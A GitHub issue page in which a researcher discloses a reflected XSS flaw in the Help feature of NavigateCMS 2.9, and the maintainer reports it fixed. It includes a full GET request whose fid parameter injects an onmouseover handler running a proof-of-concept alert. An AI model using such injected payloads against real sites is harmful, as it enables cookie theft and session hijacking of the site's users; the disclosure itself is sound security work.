search

NavigateCMS / Navigate-CMS

Navigate CMS, a very powerful open source content management system for everybody.
http://www.navigatecms.com
GNU General Public License v2.0
8 stars 4 forks source link

Reflected XSS attack on the Help feature in NavigateCMS 2.9 #23

Closed hydrasky-team closed 3 years ago

hydrasky-team commented 3 years ago

EXPECTED BEHAVIOUR An authenticated malicious user can take advantage of a Reflected XSS vulnerability in the Help feature.

IMPACT Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site.

VULNERABILITY CODE I found the vulnerability code is in \lib\layout\layout.class.php

image

STEPS TO REPRODUCE

  1. We change the request

GET /navigate-2.9.3r1525/navigate/navigate.php?fid=%22onmouseover%3d%22alert(%27xss%27)%22%3b%22&act=edit&id=&tab=0&tab_language=&form-sent=true&id=&date_to_display=2021-06-04+01%3a27&date_published=&date_unpublish=&access=0&permission=0&item-author=1&item-author-text=admin&association[]=category&category=&embedding[]=1&template=content

image

  1. Log into your account

  2. Then when people move the cursor to Help feature, the Reflected XSS is executed ( don’t need to click ).

image

NavigateCMS commented 3 years ago

Fixed by 1dfcaa3909e797d4e5632df5a8dc38decc4bd2cf and b2937f5839f25b7c16a2533ea668c1b202e9fc0c (core.php file)

Thank you very much @hydrasky-team